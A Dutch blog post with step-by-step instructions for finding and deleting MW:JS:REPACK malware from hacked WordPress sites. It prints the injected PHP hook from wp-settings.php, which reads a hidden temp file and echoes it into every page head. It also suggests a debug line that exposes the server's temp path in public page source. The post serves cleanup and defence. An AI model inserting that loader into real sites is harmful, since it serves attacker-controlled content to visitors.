De laatste paar dagen zie ik om mij heen verschillende infecties van WordPress sites met de MW:JS:REPACK malware. Je website is geblokkeerd in Google en je klanten/gebruikers kunnen de site niet meer bekijken zonder eerst een foutmelding te zien.
Mocht jouw website ook geïnfecteerd zijn, dan is hier te lezen hoe de malware verwijderd moet worden.
Allereerst de kwaadaardige code in beeld:
Deze code probeert een iframe te laden waarin hoogst waarschijnlijk nog meer ‘evil’ code geladen wordt.
We willen deze code zo snel mogelijk van de site af hebben, en weer netjes terug te vinden zijn in Google, zonder waarschuwingen.
- Open je FTP programma en navigeer naar de map waarin WordPress staat. Dat is dus de map waarin de wp-admin, wp-includes en wp-content mappen staan.
- Sorteer de bestanden op de “laatst gewijzigd” datum. Hoogst waarschijnlijk staat nu het bestand wp-settings.php bovenaan.
- Download het bestand wp-settings.php en zoek naar de volgende code
function check_wordpress(){ $t_d = sys_get_temp_dir(); if(file_exists($t_d . ‘/wp_inc’)){ readfile($t_d . ‘/wp_inc’); } } add_action(‘wp_head’, ‘check_wordpress’); - Verwijder deze code, sla het bestand op en upload deze weer naar de server.
- De malware is nu verwijderd, open je website maar om het te controleren.Let op, de malware is verwijderd uit je website, maar kan nog op de server staan.
- Vraag je hoster, of probeer het zelf, om het bestand wp_inc uit de temp map te verwijderen. Weet je niet welke dat is, plaats dan deze code in bijv. je header.php:
echo "<!-- tmpdir=".sys_get_temp_dir()." -->";
Na het verversen van je website, kan je in de broncode zien wat de temp map is. Als deze map niet binnen jouw hosting omgeving ligt, dan moet je dus je hoster inlichten en vragen of zij de code willen verwijderen.
Hoe is je website eigenlijk besmet? Dat is moeilijk te zeggen, mogelijke bronnen van infectie zijn:
- Verouderde versies van WordPress en/of plugins,
- Een virus op je computer,
- Een gehacked thema, van bijvoorbeeld een onbetrouwbare bron,
- Een plugin die opzettelijk kwade code injecteert,
- Een te makkelijk te raden wachtwoord voor WordPress en/of FTP.
Hou de komende tijd je website en de bestanden in de gaten, verander je wachtwoorden en scan je computer op mogelijk virussen/malware.
Houdt je WordPress website up to date met WordPress ondersteuning.